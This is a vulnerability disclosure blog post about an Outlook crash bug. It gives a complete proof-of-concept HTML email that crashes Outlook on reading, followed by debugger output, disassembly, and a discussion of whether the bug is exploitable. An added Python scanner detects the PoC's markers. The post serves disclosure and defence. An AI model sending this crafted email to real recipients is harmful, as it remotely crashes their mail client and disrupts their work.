Last week I reported an interesting bug in Outlook to Microsoft - it's an HTML email, and when you send this email to someone, Outlook will crash as soon as he/she *just reads* the email (a similar danger level to my #BadWinmail bug, if this one is exploitable). As MSRC told me today that they think it's a non-exploitable bug and it seems they are not going to fix it in the near future, I'm releasing the details in this quick write-up, hopefully for an "old pedant" style open discussion about the exploitability, as I still have some doubts.:-)
The PoC could be as simple as the following, or you may download the .eml file here.
Content-Type: multipart/alternative; boundary="===============111111111111=="
MIME-Version: 1.0
Subject: title
From: aa@msft.com
To: bb@msft.com

--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

plain text area
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0

<html>
<head>
<style>body{display:none !important;}</style>
</head>
<body>
<div>
e
</div>
<div>
<table>
<tr height="1%">
</tr>
</table>
</div>
<div>
e
</div>
</body>
</html>
--===============111111111111==--
If you do some tests based on the PoC, you will quickly figure out that the CSS code "<style>body{display:none !important;}</style>" is the important piece here. For example, if we remove this line, Outlook won't crash. This also suggests that the bug is related to some "CSS rendering" code in Outlook.
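As an added example (not code from the original post), here is a small Python scanner that parses a MIME message and flags HTML parts carrying both indicators seen in the PoC above: a <style> rule hiding <body> with display:none !important, and a <tr> with a percentage height. The embedded message is the post's PoC re-typed with the blank lines MIME requires; the regexes and the two-indicator heuristic are my own assumptions, not a rule from the post, and a message missing either indicator is not thereby proven safe.

```python
"""Scan an RFC 822 message for the HTML construct described in this post."""
import email
import re
from email import policy
from email.message import Message

# Constructed sample: the PoC from this post, with the MIME blank lines
# that mail clients require between headers and body.
POC_EML = """\
Content-Type: multipart/alternative; boundary="===============111111111111=="
MIME-Version: 1.0
Subject: title
From: aa@msft.com
To: bb@msft.com

--===============111111111111==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

plain text area
--===============111111111111==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0

<html><head><style>body{display:none !important;}</style></head>
<body><div>e</div><div><table><tr height="1%"></tr></table></div>
<div>e</div></body></html>
--===============111111111111==--
"""

# Heuristic indicators (assumption): a body-hiding rule and a percent-height row.
HIDDEN_BODY_RE = re.compile(
    r"body\s*\{[^}]*display\s*:\s*none\s*!important", re.IGNORECASE | re.DOTALL)
PCT_ROW_RE = re.compile(r"<tr[^>]*\bheight\s*=\s*[\"']?\d+%", re.IGNORECASE)


def html_parts(msg: Message):
    """Yield the decoded body of every text/html part in the message."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def scan_html(html: str) -> dict:
    """Report which of the two PoC indicators an HTML body contains."""
    hidden = bool(HIDDEN_BODY_RE.search(html))
    pct_row = bool(PCT_ROW_RE.search(html))
    return {"hidden_body": hidden, "percent_row": pct_row,
            "matches_poc": hidden and pct_row}


def scan_eml(raw: str) -> list:
    """Parse a raw message and scan each HTML part; one result dict per part."""
    msg = email.message_from_string(raw, policy=policy.default)
    return [scan_html(h) for h in html_parts(msg)]


if __name__ == "__main__":
    for result in scan_eml(POC_EML):
        print(result)
```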
The Crash
The following crash should be observed on Office 2010 14.0.7177.5000, fully updated as of March 21, 2017. In fact, I believe it affects all Outlook versions.
(384.400): Access violation - code c0000005 (!!! second chance !!!)
eax=0020f580 ebx=0ea72288 ecx=00000000 edx=00000000 esi=191cdfd0 edi=5d064400
eip=5c5e17e5 esp=0020f56c ebp=0020f754 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
wwlib!DllGetLCID+0x25b35f:
5c5e17e5 f781e402000000040000 test dword ptr [ecx+2E4h],400h ds:0023:000002e4=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0020f754 5c5a2b93 wwlib!DllGetLCID+0x25b35f
0020f774 5c1d80de wwlib!DllGetLCID+0x21c70d
0020f794 5c1d801b wwlib!GetAllocCounters+0x51906
0020f818 5c1d5c33 wwlib!GetAllocCounters+0x51843
0020f82c 5c26d803 wwlib!GetAllocCounters+0x4f45b
0020f83c 2f63f1b6 wwlib!GetAllocCounters+0xe702b
0020f880 2f63f06b outlook!GetMsoInst+0x32e2
0020f8a8 2ffb9d6b outlook!GetMsoInst+0x3197
0020f938 76b0ef1c outlook!PushSavedKeyToCicero+0x291d8
0020f944 7733367a kernel32!BaseThreadInitThunk+0xe
0020f984 7733364d ntdll!__RtlUserThreadStart+0x70
0020f99c 00000000 ntdll!_RtlUserThreadStart+0x1b
It crashes at the following address:
.text:31B417D2 loc_31B417D2: ; CODE XREF: sub_31714D18+42CB1Ej
.text:31B417D2 lea eax, [ebp+var_1DC]
.text:31B417D8 push eax
.text:31B417D9 push [ebp+var_4]
.text:31B417DC push ebx
.text:31B417DD call sub_3177CE19 ;memory data at eax will be updated
.text:31B417E2 mov ecx, [eax+48h] ;read the pointer at offset 0x48
.text:31B417E5 test dword ptr [ecx+2E4h], 400h ;crash
Since the data pointed to by EAX (@31B417E2) will be updated in function "sub_3177CE19", I did some debugging in that function, and it seems that:
- There seems to be a custom heap allocator, as I've seen heap block headers and links.
- "sub_3177CE19" does the job of locating the data based on the 1st param (a pointer) and the 2nd param (always 0), and the data will be copied to the heap block pointed to by the 3rd param.
- According to my tests, the copied bytes are always 0x00, so that's why it seems to be a null pointer dereference bug.
Discussions
If security is that clear, there's no security research.:-) Due to the complexity of the Office code, and since Microsoft keeps refusing to release Office symbols (I've said this about 1 million times), it's really hard to be 100% sure from outside.
The first point I'd make is that it's really hard to debug the data flow without symbols; if you look at the related code you will find that this isn't firmly a NULL pointer - instead the 0x00 bytes are copied from another pointer, and that is related to some internal structures. The second is that when I tested it in a live env (email server + Outlook env), I observed some different things. If I remember correctly, on an Outlook 2016 (32-bit) + Windows 10 (64-bit) env, when I receive/read such an email, Outlook sometimes won't crash immediately; instead, it will crash at a different address when the user performs further actions in Outlook. I don't remember the details regarding the "live test", but it does increase my doubts.
To say the least, crashing someone's Outlook *remotely* is still a bad thing, right? Think about it: someone is working in Outlook, but Outlook crashes when he/she is reading the incoming email.
Feel free to reach me about your thoughts.:-)
Thanks,
Haifei